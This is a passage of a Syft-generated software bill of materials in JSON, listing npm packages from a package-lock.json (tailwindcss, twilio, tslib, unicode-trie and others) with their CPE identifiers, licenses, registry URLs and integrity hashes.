:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg-arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg_arc:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg_arc:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg:svg-arc-to-cubic-bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:svg:svg_arc_to_cubic_bezier:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/svg-arc-to-cubic-bezier@3.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/svg-arc-to-cubic-bezier/-/svg-arc-to-cubic-bezier-3.2.0.tgz","integrity":"sha512-djbJ/vZKZO+gPoSDThGNpKDO+o+bAeA4XQKovvkNCqnIS2t+S4qnLAGQhyyrulhCFRl1WWzAp0wUDV8PpTVU3g==","dependencies":null}},{"id":"4180007fa4dbcaa3","name":"tailwindcss","version":"3.4.19","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:tailwindcss:tailwindcss:3.4.19:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/tailwindcss@3.4.19","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/tailwindcss/-/tailwindcss-3.4.19.tgz","integrity":"sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ==","dependencies":{"@alloc/quick-lru":"^5.2.0","arg":"^5.0.2","chokidar":"^3.6.0","didyoumean":"^1.2.2","dlv":"^1.1.3","fast-glob":"^3.3.2","glob-parent":"^6.0.2","is-glob":"^4.0.3","jiti":"^1.21.7","lilconfig":"^3.1.3","micromatch":"^4.0.8","normalize-path":"^3.0.0","object-hash":"^3.0.0","picocolors":"^1.1.1","postcss":"^8.4.47","postcss-import":"^15.1.0","postcss-js":"^4.0.1","postcss-load-config":"^4.0.2 || ^5.0 || ^6.0","postcss-nested":"^6.2.0","postcss-selector-parser":"^6.1.2","resolve":"^1.22.8","sucrase":"^3.35.0"}}},{"id":"5100f72eed8a2178","name":"teeny-request","version":"9.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:teeny-request:teeny-request:9.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:teeny-request:teeny_request:9.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:teeny_request:teeny-request:9.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:teeny_request:teeny_request:9.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:teeny:teeny-request:9.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:teeny:teeny_request:9.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/teeny-request@9.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz","integrity":"sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g==","dependencies":{"http-proxy-agent":"^5.0.0","https-proxy-agent":"^5.0.0","node-fetch":"^2.6.9","stream-events":"^1.0.5","uuid":"^9.0.0"}}},{"id":"9fd87e687c3b74ca","name":"thenify","version":"3.3.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:thenify:thenify:3.3.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/thenify@3.3.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/thenify/-/thenify-3.3.1.tgz","integrity":"sha512-RVZSIV5IG10Hk3enotrhvz0T9em6cyHBLkH/YAZuKqd8hRkKhSfCGIcP2KUY0EPxndzANBmNllzWPwak+bheSw==","dependencies":{"any-promise":"^1.0.0"}}},{"id":"845b1699e3aa7533","name":"thenify-all","version":"1.6.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:thenify-all:thenify-all:1.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thenify-all:thenify_all:1.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thenify_all:thenify-all:1.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thenify_all:thenify_all:1.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thenify:thenify-all:1.6.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thenify:thenify_all:1.6.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/thenify-all@1.6.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/thenify-all/-/thenify-all-1.6.0.tgz","integrity":"sha512-RNxQH/qI8/t3thXJDwcstUO4zeqo64+Uy/+sNVRBx4Xn2OX+OZ9oP+iJnNFqplFra2ZUVeKCSa2oVWi3T4uVmA==","dependencies":{"thenify":">= 3.1.0 < 4"}}},{"id":"f3444a348db654fb","name":"thirty-two","version":"1.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:thirty-two:thirty-two:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thirty-two:thirty_two:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thirty_two:thirty-two:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thirty_two:thirty_two:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thirty:thirty-two:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:thirty:thirty_two:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/thirty-two@1.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/thirty-two/-/thirty-two-1.0.2.tgz","integrity":"sha512-OEI0IWCe+Dw46019YLl6V10Us5bi574EvlJEOcAkB29IzQ/mYD1A6RyNHLjZPiHCmuodxvgF6U+vZO1L15lxVA==","dependencies":null}},{"id":"8a9f89a30def4776","name":"tiny-inflate","version":"1.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:tiny-inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny-inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny_inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny_inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny:tiny-inflate:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny:tiny_inflate:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/tiny-inflate@1.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/tiny-inflate/-/tiny-inflate-1.0.3.tgz","integrity":"sha512-pkY1fj1cKHb2seWDy0B16HeWyczlJA9/WW3u3c4z/NiWDsO3DOU5D7nhTLE9CF0yXv/QZFY7sEJmj24dK+Rrqw==","dependencies":null}},{"id":"509a74e9f8ec9c11","name":"tiny-invariant","version":"1.3.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:tiny-invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny-invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny_invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny_invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny:tiny-invariant:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:tiny:tiny_invariant:1.3.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/tiny-invariant@1.3.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/tiny-invariant/-/tiny-invariant-1.3.3.tgz","integrity":"sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg==","dependencies":null}},{"id":"ea1b10e091012c4d","name":"tinyglobby","version":"0.2.16","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:tinyglobby:tinyglobby:0.2.16:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/tinyglobby@0.2.16","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz","integrity":"sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg==","dependencies":{"fdir":"^6.5.0","picomatch":"^4.0.4"}}},{"id":"32aacf96124c437a","name":"to-regex-range","version":"5.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:to-regex-range:to-regex-range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:to-regex-range:to_regex_range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:to_regex_range:to-regex-range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:to_regex_range:to_regex_range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:to-regex:to-regex-range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:to-regex:to_regex_range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:to_regex:to-regex-range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:to_regex:to_regex_range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:to:to-regex-range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:to:to_regex_range:5.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/to-regex-range@5.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz","integrity":"sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==","dependencies":{"is-number":"^7.0.0"}}},{"id":"ce376bb248c7ffa1","name":"toidentifier","version":"1.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:toidentifier:toidentifier:1.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/toidentifier@1.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz","integrity":"sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==","dependencies":null}},{"id":"44b5fbfc3cffc498","name":"tr46","version":"0.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:tr46:tr46:0.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/tr46@0.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz","integrity":"sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==","dependencies":null}},{"id":"4b85ef460bf1550e","name":"ts-interface-checker","version":"0.1.13","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:ts-interface-checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ts-interface-checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ts_interface_checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ts_interface_checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ts-interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ts-interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ts_interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ts_interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ts:ts-interface-checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:ts:ts_interface_checker:0.1.13:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/ts-interface-checker@0.1.13","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/ts-interface-checker/-/ts-interface-checker-0.1.13.tgz","integrity":"sha512-Y/arvbn+rrz3JCKl9C4kVNfTfSm2/mEp5FSz5EsZSANGPSlQrpRI5M4PKF+mJnE52jOO90PnPSc3Ur3bTQw0gA==","dependencies":null}},{"id":"a41a6d4fcfaa1c57","name":"tslib","version":"2.4.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"0BSD","spdxExpression":"0BSD","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:tslib:tslib:2.4.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/tslib@2.4.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz","integrity":"sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==","dependencies":null}},{"id":"732c6f5be784c8f2","name":"tslib","version":"2.8.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"0BSD","spdxExpression":"0BSD","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:tslib:tslib:2.8.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/tslib@2.8.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz","integrity":"sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==","dependencies":null}},{"id":"b26b672319df2e47","name":"twilio","version":"5.13.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:twilio:twilio:5.13.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/twilio@5.13.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/twilio/-/twilio-5.13.1.tgz","integrity":"sha512-sT+PkhptF4Mf7t8eXFFvPQx4w5VHnBIPXbltGPMFRe+R2GxfRdMuFbuNA/cEm0aQR6LFQOn33+fhClg+TjRVqQ==","dependencies":{"axios":"^1.13.5","dayjs":"^1.11.9","https-proxy-agent":"^5.0.0","jsonwebtoken":"^9.0.3","qs":"^6.14.1","scmp":"^2.1.0","xmlbuilder":"^13.0.2"}}},{"id":"a8ca97010550105a","name":"type-is","version":"1.6.18","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:type-is:type-is:1.6.18:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:type-is:type_is:1.6.18:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:type_is:type-is:1.6.18:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:type_is:type_is:1.6.18:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:type:type-is:1.6.18:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:type:type_is:1.6.18:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/type-is@1.6.18","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz","integrity":"sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==","dependencies":{"media-typer":"0.3.0","mime-types":"~2.1.24"}}},{"id":"e635ba578a775ab5","name":"typedarray","version":"0.0.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:typedarray:typedarray:0.0.6:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/typedarray@0.0.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz","integrity":"sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==","dependencies":null}},{"id":"9968e425c772df9f","name":"undici-types","version":"6.21.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:undici-types:undici-types:6.21.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:undici-types:undici_types:6.21.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:undici_types:undici-types:6.21.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:undici_types:undici_types:6.21.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:undici:undici-types:6.21.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:undici:undici_types:6.21.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/undici-types@6.21.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz","integrity":"sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==","dependencies":null}},{"id":"541fbe3121e73dce","name":"unicode-properties","version":"1.4.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:unicode-properties:unicode-properties:1.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode-properties:unicode_properties:1.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode_properties:unicode-properties:1.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode_properties:unicode_properties:1.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode:unicode-properties:1.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode:unicode_properties:1.4.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/unicode-properties@1.4.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/unicode-properties/-/unicode-properties-1.4.1.tgz","integrity":"sha512-CLjCCLQ6UuMxWnbIylkisbRj31qxHPAurvena/0iwSVbQ2G1VY5/HjV0IRabOEbDHlzZlRdCrD4NhB0JtU40Pg==","dependencies":{"base64-js":"^1.3.0","unicode-trie":"^2.0.0"}}},{"id":"aac566dbf0b492ea","name":"unicode-trie","version":"2.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:unicode-trie:unicode-trie:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode-trie:unicode_trie:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode_trie:unicode-trie:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode_trie:unicode_trie:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode:unicode-trie:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:unicode:unicode_trie:2.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/unicode-trie@2.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/unicode-trie/-/unicode-trie-2.0.0.tgz","integrity":"sha512-x7bc76x0bm4prf1VLg79uhAzKw8DVboClSN5VxJuQ+LKDOVEW9CdH+VY7SP+vX7xCYQqzzgQpFqz15zeLvAtZQ==","dependencies":{"pako":"^0.2.5","tiny-inflate":"^1.0.0"}}},{"id":"294cc6dab10e14ff","name":"unpipe","version":"1.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:unpipe:unpipe:1.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/unpipe@1.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz","integrity":"sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ==","dependencies":null}},{"id":"7776752fe1d43a3e","name":"update-browserslist-db","version":"1.2.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:update-browserslist-db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:update-browserslist-db:update_browserslist_db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:update_browserslist_db:update-browserslist-db:1.2.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"